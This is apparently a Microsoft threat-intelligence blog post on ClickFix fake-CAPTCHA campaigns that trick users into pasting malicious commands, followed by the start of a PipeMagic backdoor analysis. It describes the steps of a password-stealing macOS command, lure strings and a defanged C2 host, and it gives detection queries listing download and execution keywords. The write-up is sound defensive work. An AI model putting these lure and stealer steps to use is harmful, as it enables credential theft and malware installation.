Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organizations could thus reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks). Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.
This blog discusses the different elements that make up a ClickFix campaign—from the arrival vectors it comes with to its various implementations—and provides different examples of threat campaigns we’ve observed to further illustrate these elements. We also provide recommendations and detection details to surface and mitigate this threat.
A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure—usually a landing page—and trick them into executing a malicious command themselves. By adding this user interaction element in the attack chain, a threat using the ClickFix technique could slip through conventional and automated security solutions.
Microsoft Threat Intelligence observed threat actors adapting and improving certain elements of the technique to further evade detection. For example, threat actors obfuscate the JavaScript that generates the visual lures or they download parts of the code from different servers. They also employ various tactics in obfuscating malicious commands. We discuss these stages of the attack chain in detail in the succeeding sections of this blog.
Once the malicious command is run by the user, malware is downloaded into the target device. We’ve observed numerous threat actors that leverage ClickFix attacks deliver the following:
Infostealers like LummaStealer, which appears to be the most prolific ClickFix final payload based on our observations and threat hunting investigations
Remote access tools (RATs) such as Xworm, AsyncRAT, NetSupport, and SectopRAT, which could allow threat actors to conduct hands-on keyboard activity like discovery, lateral movement, and persistence
Loaders like Latrodectus and MintsLoader, which could deliver additional malware and other payloads
Rootkits, such as a modified version of the open source r77, which could allow threat actors to employ several sophisticated persistence and defense evasion tactics and remain deeply embedded in a victim system
These final payloads are often “fileless”, that is, they’re seldom written to disk as a Windows executable (.exe or .dll) file. Instead, they’re loaded and launched in memory by living-off-the-land binaries (LOLBins), often as a .NET assembly or Common Language Runtime (CLR) module. However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.
Figure 1. The typical ClickFix attack chain
Case study: Lampion malware campaign
To illustrate a typical ClickFix attack chain, let’s look at a campaign we first identified in May 2025 targeting Portuguese organizations in government, finance, and transportation sectors to deliver Lampion malware, an infostealer focused on banking information. This campaign has since been observed in other countries—including Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico—targeting organizations in the government, education, transportation, and financial services industries. As of June 2025, this campaign remains active.
The Lampion malware campaign’s ClickFix lures, obfuscation methods, and multi-stage infection process are designed to evade detection:
The threat actor sends phishing emails containing a ZIP file, which when opened, contains an HTML file that redirects target users to a fake Portuguese tax authority site where the ClickFix lure is hosted.
The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs).
The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.
This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.
The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.
After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.
However, during our investigation, the actual Lampion malware wasn’t delivered because the download command was commented out of the code.
Figure 2. Lampion infection chain
Before the click: Arrival vectors
Threat actors leveraging ClickFix rely on a variety of methods to lure unwitting users. We’ve observed three primary avenues where a user could encounter a ClickFix prompt: by receiving phishing emails, encountering a malicious ad, or by visiting a compromised or malicious website.
Phishing
Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607. These emails contained HTML attachments that attempted to install DarkGate, a commodity loader that is capable of keylogging, cryptocurrency mining, establishing C2 communications, and downloading additional malicious payloads, among others.
One of Storm-1607’s campaigns observed in May 2024 consisted of tens of thousands of emails targeting organizations in the United States (US) and Canada. These emails used payment and invoice lures and contained attachments with file names like reports_528647.html:
Figure 3. Storm-1607 phishing email
When opened, the HTML loaded a page with a fake Microsoft Word new document image and a dialog box showing an error message and prompting the user to click the How to fix button:
Figure 4. HTML attachment displaying a Microsoft Word background and ClickFix lure
Clicking the button copied the malicious code on the user’s clipboard in the background. Meanwhile, the dialog box added new instructions that explained to the user how to open Windows Terminal and paste the malicious code into it:
Figure 5. ClickFix lure displaying further instructions
While other threat actors also use invoice or payment lures in their phishing campaigns, as of this writing, including HTML attachments in the emails is no longer the preferred method to implement the ClickFix technique. Instead, threat actors now include in their phishing email a URL that points to a ClickFix landing page. For example, in March 2025, we observed a threat actor tracked as Storm-0426 launch a campaign consisting of thousands of phishing emails that targeted users in Germany and attempted to install MintsLoader. The emails used payment and invoice lures purportedly from a web hosting provider and contained URLs leading to the Prometheus traffic direction system (TDS) hosted on numerous compromised sites:
Figure 6. Storm-0426 phishing email
The TDS redirected users to the attacker-controlled website mein-lonos-cloude[.]de, where the ClickFix technique instructed the users to complete a human verification process by following the displayed instructions, which launched a malicious code:
Figure 7. ClickFix landing page
Another example of a phishing campaign using URLs and redirectors was observed in June 2025, where the campaign impersonated the US Social Security Administration (SSA) and used a combination of social engineering and domain spoofing to deliver ScreenConnect, a legitimate remote management tool that has become increasingly abused by threat actors. Once installed, ScreenConnect could give an attacker full remote control over a victim’s system, enabling them to exfiltrate data, install additional malware, or conduct surveillance.
The campaign began with emails sent from a legitimate but compromised Brazilian domain. The message, which even included legitimate links to SSA’s official social media accounts in the footer, claimed that there was an issue with the recipient’s social security statement. Like other phishing emails, these characteristics and tactics were all attempts by the threat actor to bypass spam filters, lend credibility and reduce suspicion to the message, and prompt the user to take immediate action:
Figure 8. Phishing email impersonating the US SSA
The message’s call-to-action button, labeled Download Statement, was also particularly deceptive because instead of linking directly to a malicious site, it used a Google Ads URL redirect to obfuscate the final destination. This technique not only helped the email pass through conventional email security solutions, it also undermined an email best practice (hovering over the links before clicking to determine if the URL displayed points to the intended site or not) users are typically taught as part of their security awareness trainings.
When a user clicked the Download Statement button, they were redirected to a spoofed SSA website hosted on a Spanish top-level domain (access-ssa-gov[.]es). The site closely mimicked the real SSA home page, including a blurred background image of the legitimate site to create a false sense of familiarity and trust:
Figure 9. ClickFix landing page impersonating the US SSA
The landing page presented the user with a CAPTCHA human verification pop-up, which was part of the ClickFix technique. Behind the scenes, this interaction triggered a series of fake verification steps designed to guide the user into running a PowerShell script that would eventually download and launch the ScreenConnect payload:
Figure 10. ClickFix instructions from the spoofed US SSA domain
Malvertising
Malvertising is another popular delivery method that leads to ClickFix landing pages. In a campaign observed in April 2025, users who attempted to stream free or pirated movies on certain websites inadvertently launched a variety of scam pages in a new browser tab when they interacted with a movie (for example, by pressing the play button):
Figure 11. Example of a free movie streaming website
One of these scam pages was a ClickFix landing page that downloaded and installed Lumma Stealer:
Figure 12. ClickFix landing page the users were redirected to if they clicked the “Play” button on the free movie website
This activity cluster is notable because it renamed the various intermediate HTA scripts to media format extensions such as .mp3, .mp4, or .ogg. It’s also notable for its high traffic volumes: in a single day, tens of thousands, if not hundreds of thousands, of unique visitors could be funneled to scam pages (including the ClickFix landing page) through the malvertising redirectors.
Drive-by compromise
Some threat actors have also been observed to leverage compromised websites to deliver the ClickFix landing page. For example, the threat actor we track as Storm-0249 has traditionally used email to deliver Latrodectus or other initial access malware—whether by using PDF files or URL links (sometimes copyright infringement-themed). However, since the beginning of March 2025, Storm-0249 switched to compromising legitimate websites, potentially through WordPress vulnerabilities, and using the ClickFix technique to deliver its payloads.
When a user visits the compromised site, the original page is briefly displayed before it’s replaced with the ClickFix human verification lure. This specific lure even spoofs Cloudflare to further trick users into thinking that the verification step is legitimate:
Figure 13. ClickFix lure spoofing Cloudflare Turnstile on a compromised site
Inside the click: ClickFix implementations
ClickFix operators use several methods to attempt to convince a target to perform user-level command execution on their system. Early landing pages mimicked Google’s “Aw, Snap!” crash error or Word Online extension missing message (as depicted in Figure 4), while recent ones spoof Google’s reCAPTCHA and Cloudflare’s Turnstile solution. We’ve even observed threat actors spoof social media platforms like Discord to trick users into believing they’re joining an actual Discord server. Many elements go into building ClickFix lure pages—from JavaScript inline frames (iframes) and HTML href codes to cascading style sheets (CSS) resources—to make them more legitimate-looking.
There are various ways that ClickFix is implemented: some implementations are contained in one file or page, while others use remote resources. Some threat actors leave code comments amateurishly while others obfuscate their code. There are even implementations that report the status of an infection to a Telegram channel or a web server. We provide a few examples of these implementations and discuss their inner workings.
Impersonating Cloudflare Turnstile
Figure 14 shows a partial screenshot of a ClickFix landing page, binancepizza[.]info, displaying a seemingly legitimate Cloudflare Turnstile verification process that a user is lured to interact with before they can supposedly access the site:
Figure 14. The ClickFix landing page binancepizza[.]info
Its HTML source code clones this Cloudflare Turnstile style page using a href attribute to a CSS resource hosted by the Font Awesome library:
Figure 15. HTML code highlighting a CSS resource for a Cloudflare verification prompt
The page also references an HTML file (field.html) using a hidden iframe:
Figure 16. HTML code highlighting hidden iframe and text needing to “verify”
Within field.html, we see in Figure 17 that contentElis the iframe element representing the fake Cloudflare Turnstile verification check box. When a user ticks the Verify you are human check box, this script animates a fake spinner through runVerification()and sends postMessage(“trigger”) to the parent window (the main landing page).
Figure 17. JavaScript code of iframe field.html, highlighting elements that send a trigger message upon verification click
The user is then presented with the ClickFix instructions (Figure 18), while the obfuscated command is copied to the user’s clipboard (Figure 19):
Figure 18. ClickFix instructions from binancepizza[.]infoFigure 19. Malicious command copied to clipboard
Figure 20 shows that the clipboard copy occurs once the code receives the message “trigger”, which is sent by the field.html hidden iframe. Once that message is received, the script uses navigator.clipboard.writeText(codeToCopy) to copy the command to the clipboard.
Figure 20. JavaScript code highlighting the method navigator.clipboard.writeText, which copies a malicious command to clipboard
Impersonating social platforms
It’s important to note that not all ClickFix landing pages are designed in the same manner and might not strictly contain the elements discussed previously. In some instances, threat actors also mimic popular social platforms to broaden their reach of potential targets.
Figure 21 shows a ClickFix landing page spoofing a Discord server supposedly needing to verify a user before they can join:
Figure 21. Fake Discord server landing page implementing ClickFix.
In this page’s source code (Figure 22), we can see it referencing the Discord logo image file to appear legitimate. Additionally, theaddEventListener method waits for the Verify button to get clicked (through verifyBtn) so navgiator.clipboard.writetext(command) can copy the malicious command to the user’s clipboard. This JavaScript method is a Clipboard API that allows for accessing the operating system (OS) clipboard. Older pages might use document.execCommand(), which is now deprecated.
The fake Discord landing page differs from the previous example because the reference of an external trigger (from the hidden iframe) isn’t used here. Instead, the click then copy is all processed from the main window. Based on our analysis, this landing page also appears to be part of the OBSCURE#BAT campaign delivering r77 rootkit.
Figure 22. HTML code highlighting use of Discord logo and JavaScript elements that copy a malicious command to clipboard upon clicking “verify”
The “fix”: User-level code execution
The ClickFix technique typically presents its “fix” by instructing users to run malicious commands or code in the Windows Run dialog box. We assess that the threat actors who use this technique are banking on the idea that most of their targets aren’t familiar with this Windows OS component and what it’s used for, unlike the more advanced users doing system administrator tasks. Early ClickFix lures instructed users to run commands manually and directly in Windows Terminal or Windows PowerShell. However, multiple line warnings might have deterred potential victims from running these commands, leading to the threat actors changing their tactics.
Figure 23. Example of a multiple line warning in Windows Terminal
Detecting Windows Run dialog misuse
The Windows Run dialog (Win + R) is a trusted shell input user interface (UI) that’s part of Windows Explorer (explorer.exe). Internally, it uses ShellExecute or CreateProcess APIs to resolve and launch commands. The input is limited to MAX_PATH, requiring a null-terminated string (\0) with a practical maximum of 259 characters. Additionally, as part of the Run dialog, Windows loads tiptsf.dll module in explorer.exe. This DLL file is related to the Text Services Framework (TSF), which provides input processor interface.
Figure 24. The Windows Run dialog box
Entering commands into the Run dialog leaves forensic traces—most notably in the RunMRU(Most Recently Used) registry key. This key keeps a history of Run dialog executions and can be used to reconstruct user-initiated activity during investigations. Note that it doesn’t create a registry entry if the process execution fails.
Figure 25. RunMRU registry key entry with a malicious ClickFix command
To determine if a ClickFix command execution is potentially occurring in the environment, one can check the RunMRU entries if they include signs pointing to LOLBins—such as powershell, mshta, rundll32, wscript, curl, and wget—that can execute code and/or download payloads. PowerShell continues to be the most leveraged native binary, with cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) being very prolific.
Additional suspicious elements to check in entries within the RunRMU registry key include the following:
First-stage payloads are often hosted by direct IP addresses, content delivery network (CDN) domains, interesting top-level domains (for example, .live,. shop, .icu), or code-sharing platforms such as pastes.
First-stage payloads are often delivered and/or launched as specific file type such as .html, .hta, .txt, .zip, .msi, .bat, .ps1, or .vbs
The file type of the scripts might be renamed to media extensions (such as .png, .mp3, .mp4, .wav, and .jpg) to hide their true intent.
The file type might employ double file extension for evasion (for example, file.hta.mp4)
URLs are often shortened using shorteners such as Bitly.
A fake reCAPTCHA, CAPTCHA, or Turnstile confirmation is included, such as the following:
✅ “I am not a robot – reCAPTCHA Verification ID: XXXX”
# # I am not a robot: CAPTCHA Verification UID: XXXX\
# “Human, not a robot: CAPTCHA: Verification ID: XXXX”
✔️ “Cloud identificator:XXXX”
Figure 26. Examples of generic ClickFix commands
Obfuscation and execution techniques for defense evasion
The command examples in the previous section aren’t all encompassing, as we’ve observed threat actors employing a growing number of obfuscation and execution techniques for defense evasion. These techniques include nested execution chains, proxy command abuse, encoding schemes such as Base64, use of string concatenation/fragmentation, and escaped characters, among others.
Figure 27. Example of a ClickFix command that was using nested PowerShell, string obfuscation through concatenated ampersand (“&”) delimiters, and benign sounding phrase (for example, “Microsoft Defender Services Secure Access”)Figure 28. Example of a ClickFix command that was using LOLBIN stacking (repeated cmd.exe) and obfuscation through escape characters (^)Figure 29. Example of a ClickFix command that was obfuscated using string splitting and concatenation, indexed character access through the $1 command string, and ampersand execution
Beyond Windows: ClickFix targeting macOS users
In June 2025, a ClickFix campaign was reported to be targeting macOS users to deliver Atomic macOS Stealer (AMOS). This new campaign is yet another mark in the continuously evolving threat landscape, as the ClickFix technique was previously observed to be more common in Windows-based attacks.
The campaign, which according to our analysis goes back to late May 2025, redirected target users to Clickfix-themed delivery websites that were impersonating Spectrum, a US-based company that provides services for cable television, internet access, and unified communications:
Figure 30. ClickFix landing page with a fake CAPTCHA
Like any other ClickFix campaign, when the user clicks the Alternate verification button, the page displays instructions the user has to follow to “fix” their issue. Interestingly, the steps the lure displays even on macOS users are for Windows devices:
Figure 31. ClickFix instructions presented to the target user
Meanwhile, in the background, a malicious command is copied to the user’s clipboard. The command that is copied is different for macOS and Windows devices.
Windows:
Figure 32. Screenshot of the ClickFix command copied on Windows devices
macOS:
Figure 33. Screenshot of the ClickFix command copied on macOS devices
The command that’s copied for macOS devices instructs the system to perform the following actions:
Get current user:username=$(whoami)
Prompt for the correct password: Continuously prompt System Password: until the user enters the correct password
Validate password: Use dscl . -authonly to verify the password against macOS directory services
Store password: Save the valid password to the /tmp/.pass file
Remove quarantine: Use the stolen password with sudo -S xattr -c to bypass macOS security
Make an executable file:chmod +x /tmp/update
Launch the malware: Run the downloaded file /tmp/update
The file saved as update within the tmp directory belongs to the AMOS malware family. AMOS variants such as Poseidon and Odyssey are known to steal user information, including browser cookies, passwords, and cryptocurrency wallet credentials.
Behind the click: ClickFix kits and other services for sale
Microsoft Threat Intelligence has observed several threat actors selling the ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. Some of these actors are bundling ClickFix builders into their existing kits that already generate various files such as LNK, JavaScript, and SVG files. The kits offer creation of landing pages with a variety of available lures including Cloudflare. They also offer construction of malicious commands that users will paste into the Windows Run dialog. These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. We’ve also discovered sellers that offer one-time and piece-meal solutions (for example, only the source code, landing page, or the command line) priced anywhere between US$200 and US$500.
Figures 34 and 35 show an example of a ClickFix builder that offers a variety of configurable options such as:
Displaying a decoy PDF file after a target user is phished
Payload execution timing
Virtual machine (VM) detection and evasion (“Anti VM”) and user access control (UAC) bypass
Visual template to be used, such as Google Meet, Google CAPTCHA, or Cloudflare
Language to be used, for example, English, German, Spanish, French, Italian, or Portuguese
Figure 34. Screenshot of a ClickFix builder, taken from the seller’s demo videoFigure 35. Another screenshot of a ClickFix builder, taken from the seller’s demo video
ClickFix protection and detection
Microsoft Defender XDR offers comprehensive coverage for ClickFix attacks by leveraging a range of available technologies across different attack layers. For example, Microsoft Defender SmartScreen displays a warning to Microsoft Edge users when they visit a ClickFix landing page:
Figure 36. Microsoft Defender SmartScreen flagging a ClickFix landing page
Even if a user chooses to bypass the SmartScreen warning or is using a different web browser and is socially engineered to execute a command in the Run dialog, Microsoft Defender for Endpoint detects and mitigates the attacks initial access activities like the suspicious process execution and command-line activity during the process scan phase.
Most attack paths eventually lead to the execution of either PowerShell or HTA scripts. Microsoft’s Antimalware Scan Interface (AMSI) provides scanning capabilities for both scripting environments and PowerShell applications. Defender’s Cloud Protection delivers enhanced protection by monitoring and intercepting outgoing connections to malicious URLs as well as analyzing process execution patterns. Additionally, Microsoft Defender for Office 365 analyzes end-to-end links and HTML attachments, and has fake CAPTCHA behavioral signatures that proactively block ClickFix-related phishing emails.
Additional attack chain coverage with network protection
In early 2025, Microsoft Defender Experts observed thousands of devices being affected by a ClickFix attack (that is, the ClickFix command was executed by a user on the device) per month, even with an endpoint detection and response (EDR) solution enabled. Due to this, our researchers performed pattern-of-life analysis to follow the tactics, techniques, and procedures (TTPs) in the attack timeline and understand the gaps that can be filled so that the attack could be stopped at the initial access stage. Their research resulted in the automation of the analysis and collection of numerous obfuscated/encoded LOLBin commands observed in the RunMRU registry, and they were able to successfully extract and block newly created malicious domainsthrough Defender for Endpoint’s network protection feature. This feature is an important component on the protection against ClickFix because blocking the C2 domains early in the attack chain prevents the download and/or execution of first-stage payloads, effectively making the attack unsuccessful.
Recommendations
Microsoft Threat Intelligence recommends the following mitigations to reduce the impact of this threat.
Educate users to identify social engineering attacks.
Ensure users are aware of what they copy and paste.
Check your Microsoft 365 email filtering settings to ensure spoofed emails, spam, and emails with malware are blocked. Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Defender for Office 365 to recheck links on click and delete sent mail in response to newly acquired threat intelligence. Turn on safe attachments policies to check attachments to inbound email.
Block web pages from automatically running Flash plugins.
Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Enable PowerShell script block logging to detect and analyze obfuscated or encoded commands, providing visibility into malicious script execution that might otherwise evade traditional logging.
Use PowerShell execution policies such as setting AllSigned or RemoteSigned tohelp reduce the risk of malicious execution by ensuring only trusted, signed scripts are executed, adding a layer of control.
Use Group Policy to deploy hardening configurations throughout your environment, if certain features are not necessary:
Disable the Run dialog box (Win + R) key and remove the Run option from the Start Menu by selecting User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu.
Create an App Control policy that prohibits the launch of native Windows binaries from Run. This can be accomplished by defining a rule based on the specific process that is launching binaries like PowerShell.
Microsoft Defender XDR customers can also implement the following attack surface reduction rules to harden an environment against PowerShell techniques used by threat actors:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
The following Microsoft Defender for Endpoint alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:
Suspicious command in RunMRU registry
Use of living-off-the-land binary to run malicious code
Suspicious process executed PowerShell command
Suspicious PowerShell command line
Suspicious ‘SuspClickFix’ behavior was blocked
An active ‘SuspDown’ malware was prevented from executing via AMSI
Suspicious ‘MaleficAms’ behavior was blocked
An active ‘ClickFix’ malware in a command line was prevented from executing
‘ClickFix’ malware was prevented
Information stealing malware activity
Powershell made a suspicious network connection
Suspicious process launch by Rundll32.exe
Suspicious Rundll32 command-line
Suspicious Scheduled Task Process Launched
Microsoft Defender for Office 365
Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:
A potentially malicious URL click was detected
Email messages containing malicious URL removed after delivery
Email messages removed after delivery
A user clicked through to a potentially malicious URL
Suspicious email sending patterns detected
Email reported by user as malware or phish
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Check impact of an external threat article
Suspicious script analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
ClickFix commands execution
Identify ClickFix commands execution.
DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet"
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryKey has @"\CurrentVersion\Explorer\RunMRU"
| where RegistryValueData has "✅"
or (RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
and RegistryValueData matches regex "[\u0400-\u04FF\u0370-\u03FF\u0590-\u05FF\u0600-\u06FF\u0E00-\u0E7F\u2C80-\u2CFF\u13A0-\u13FF\u0530-\u058F\u10A0-\u10FF\u0900-\u097F]")
or (RegistryValueData has "mshta" and RegistryValueName !~ "MRUList" and RegistryValueData !in~ ("mshta.exe\\1", "mshta\\1"))
or (RegistryValueData has_any ("bitsadmin", "forfiles", "ProxyCommand=") and RegistryValueName !~ "MRUList")
or ((RegistryValueData startswith "cmd" or RegistryValueData startswith "powershell")
and (RegistryValueData has_any ("-W Hidden ", " -eC ", "curl", "E:jscript", "ssh", "Invoke-Expression", "UtcNow", "Floor", "DownloadString", "DownloadFile", "FromBase64String", "System.IO.Compression", "System.IO.MemoryStream", "iex", "Invoke-WebRequest", "iwr", "Get-ADDomainController", "InstallProduct", "-w h", "-X POST", "Invoke-RestMethod", "-NoP -W", ".InVOKe", "-useb", "irm ", "^", "[char]", "[scriptblock]", "-UserAgent", "UseBasicParsing", ".Content")
or RegistryValueData matches regex @"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s[A-Za-z0-9+/=]{15,}"))
Lampion malware activity
The following query searches for PowerShell command associated with Lampion malware activity that is used to download malicious files.
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessParentFileName == "explorer.exe"
| where FileName has_any ("WScript.exe")
| where ProcessCommandLine contains "\"PowerShell.exe\" -windowstyle minimized -Command"
and ProcessCommandLine has "Invoke-WebRequest"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
To know how Microsoft can help your team stop similar threats and prevent future compromise with human-led managed services, check out Microsoft Defender Experts for XDR.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Among the plethora of advanced attacker tools that exemplify how threat actors continuously evolve their tactics, techniques, and procedures (TTPs) to evade detection and maximize impact, PipeMagic, a highly modular backdoor used by Storm-2460 masquerading as a legitimate open-source ChatGPT Desktop Application, stands out as particularly advanced.
Beneath its disguise, PipeMagic is a sophisticated malware framework designed for flexibility and persistence. Once deployed, it can dynamically execute payloads while maintaining robust command-and-control (C2) communication via a dedicated networking module. As the malware receives and loads payload modules from C2, it grants the threat actor granular control over code execution on the compromised host. By offloading network communication and backdoor tasks to discrete modules, PipeMagic maintains a modular, stealthy, and highly extensible architecture, making detection and analysis significantly challenging.
Microsoft Threat Intelligence encountered PipeMagic as part of research on an attack chain involving the exploitation of CVE-2025-29824, an elevation of privilege vulnerability in Windows Common Log File System (CLFS). We attributed PipeMagic to the financially motivated threat actor Storm-2460, who leveraged the backdoor in targeted attacks to exploit this zero-day vulnerability and deploy ransomware. The observed targets of Storm-2460 span multiple sectors and geographies, including the information technology (IT), financial, and real estate sectors in the United States, Europe, South America, and Middle East. While the impacted organizations remain limited, the use of a zero-day exploit, paired with a sophisticated modular backdoor for ransomware deployment, makes this threat particularly notable.
This blog provides a comprehensive technical deep dive that adds to public reporting, including by ESET Research and Kaspersky. Our analysis reveals the wide-ranging scope of PipeMagic’s internal architecture, modular payload delivery and execution mechanisms, and encrypted inter-process communication via named pipes.
The blog aims to equip defenders and incident responders with the knowledge needed to detect, analyze, and respond to this threat with confidence. As malware continues to evolve and become more sophisticated, we believe that understanding threats such as PipeMagic is essential for building resilient defenses for any organization. By exposing the inner workings of this malware, we also aim to disrupt adversary tooling and increase the operational cost for the threat actor, making it more difficult and expensive for them to sustain their campaigns.
PipeMagic: Technical analysis
PipeMagic has been used by Storm-2460 in multiple instances as part of pre-exploitation activity for attack chains involving CVE-2025-29824. Microsoft Threat Intelligence observed Storm-2460 using the certutil utility to download a file from a legitimate website that was previously compromised to host the threat actor’s malware. The downloaded payload is a malicious MSBuild file that ultimately drops and executes PipeMagic in memory. Once PipeMagic is running, the threat actor performs the CLFS exploit to escalate privileges before launching their ransomware.
The first stage of the PipeMagic infection execution begins with a malicious in-memory dropper disguised as the open-source ChatGPT Desktop Application project. The threat actor uses a modified version of the GitHub project that includes malicious code to decrypt and launch an embedded payload in memory.
The embedded payload is the PipeMagic malware, a modular backdoor that communicates with its C2 server over TCP. Once active, PipeMagic receives payload modules through a named pipe and its C2 server. The malware self-updates by storing these modules in memory using a series of doubly linked lists. These lists serve distinct purposes for staging, execution, and communication, enabling the threat actor to interact and manage the backdoor’s capabilities throughout its lifecycle.
Internal linked list structures
In our analysis, we identified the use of four distinct doubly linked list structures, each serving a unique function within the backdoor’s architecture:
Payload linked list: Stores raw payload modules in each node, representing the initial stage of modular deployment.
Execute linked list: Contains payload modules that have been successfully loaded into memory and are ready for execution.
Network linked list: Contains networking modules responsible for C2 communication.
Unknown linked list: This structure lacks an immediately observable function. Based on behavioral analysis, we hypothesize it is leveraged dynamically by loaded payloads rather than the core backdoor logic itself.
In the next sections, we will detail how each of these linked lists is populated and utilized as we walk through the malware’s execution flow and capabilities.
Populating the payload linked list
The malware uses a doubly linked list structure to manage its payload modules, with each node encapsulating a payload in its raw Windows Portable Executable (PE) format. Before initializing this list, the malware generates a 16-byte random bot identifier unique to the infected host.
Figure 1. Bot ID generation
It then spawns a dedicated thread to establish a named pipe for payload delivery. The pipe is created using the format ‘\\.\pipe\1.<Bot ID hex string>‘, where the bot ID is the randomly generated ID above.
Figure 2. Pipe name generation
A bidirectional named pipe is established, enabling both read and write operations between the malware (acting as the pipe client) and the payload delivery mechanism (pipe server). The malware continuously listens on this pipe, reading incoming payload modules in a loop. For each module, the malware reads the payload’s length from the pipe, allocates memory accordingly, reads the payload content, and adds it to the payload module linked list.
Figure 3. Connecting and reading pipe data
The structure below represents the layout of the pipe data being delivered to the malware from the pipe server.
struct pipe_data_struct
{
DWORD module_setup_flag; // add module node (1) or stop reading pipe (2)
DWORD module_index; // module index
DWORD module_name; // module name
DWORD module_body_len; // length of module data
DWORD module_body_SHA1_hash; // SHA1 hash of module data
BYTE module_body[]; // pointer to module data
};
After the pipe data is read, the malware extracts the module body and decrypts it using RC4 with the following hardcoded 32-byte key:
The malware then computes the SHA-1 hash of the decrypted data and compares it against the hash provided in the pipe data to verify integrity.
Figure 4. Decrypting module data and performing hash validation
Upon successful validation, the malware constructs the following node structure representing the payload module and inserts it at the head of the payload linked list. This same structure is also used later in the execute linked list.
struct __declspec(align(8)) module_node
{
module_node *next; // next node
module_node *prev; // previous node
DWORD module_index; // module index
DWORD exec_ll_module_index; // module index in the execute linked list
BYTE *module_data_ptr; // module pointer
DWORD module_data_len; // module length
DWORD module_name; // module name
int module_entry; // module entrypoint
int module_attribute; // attribute (4: aPLib compressed, 8: RC4 encrypted, 12: both)
BYTE module_initialized_flag; // initialized flag
BYTE *module_hash_ptr; // module SHA1 hash
DWORD module_hash_len; // module SHA1 hash length
};
Figure 5. Populating payload module with pipe data
The malware communicates the result of this operation back to the pipe server using the following response codes:
Code
Description
0x0
Success – module node created and inserted
0x1
Invalid pipe data size
0x3
Failed to create a payload module node
0xA
SHA-1 hashing of module data failed
0xB
Hash mismatch – integrity check failed
This thread remains active throughout the backdoor’s lifecycle, allowing the threat actor to continuously deliver new payloads through the named pipe. The thread only terminates when the malware receives a module setup flag value of 2 in the pipe data, signaling the end of payload delivery.
Malware configuration
The malware uses a well-defined configuration structure to manage its operational parameters.
The outermost configuration is represented by the following structure. It consists of a length field followed by a data buffer of that length:
If the config_len field is the constant 0x5A, the hardcoded configuration is deemed invalid, and the malware simply operates in local execution mode, communicating exclusively with the loopback interface at 127.0.0[.]1:8082. This mode is likely used for testing or staging purposes, allowing the malware to simulate C2 interactions without external network dependencies.
The config_data field itself contains multiple configuration blocks. Each block follows a consistent internal format:
The malware uses the block_index field to identify and retrieve specific configuration blocks as needed. Below is a breakdown of the known block indices and their corresponding data:
Block index
Block description
Block data
1
C2 config block
aaaaabbbbbbb.eastus.cloudapp.azure[.]com:443
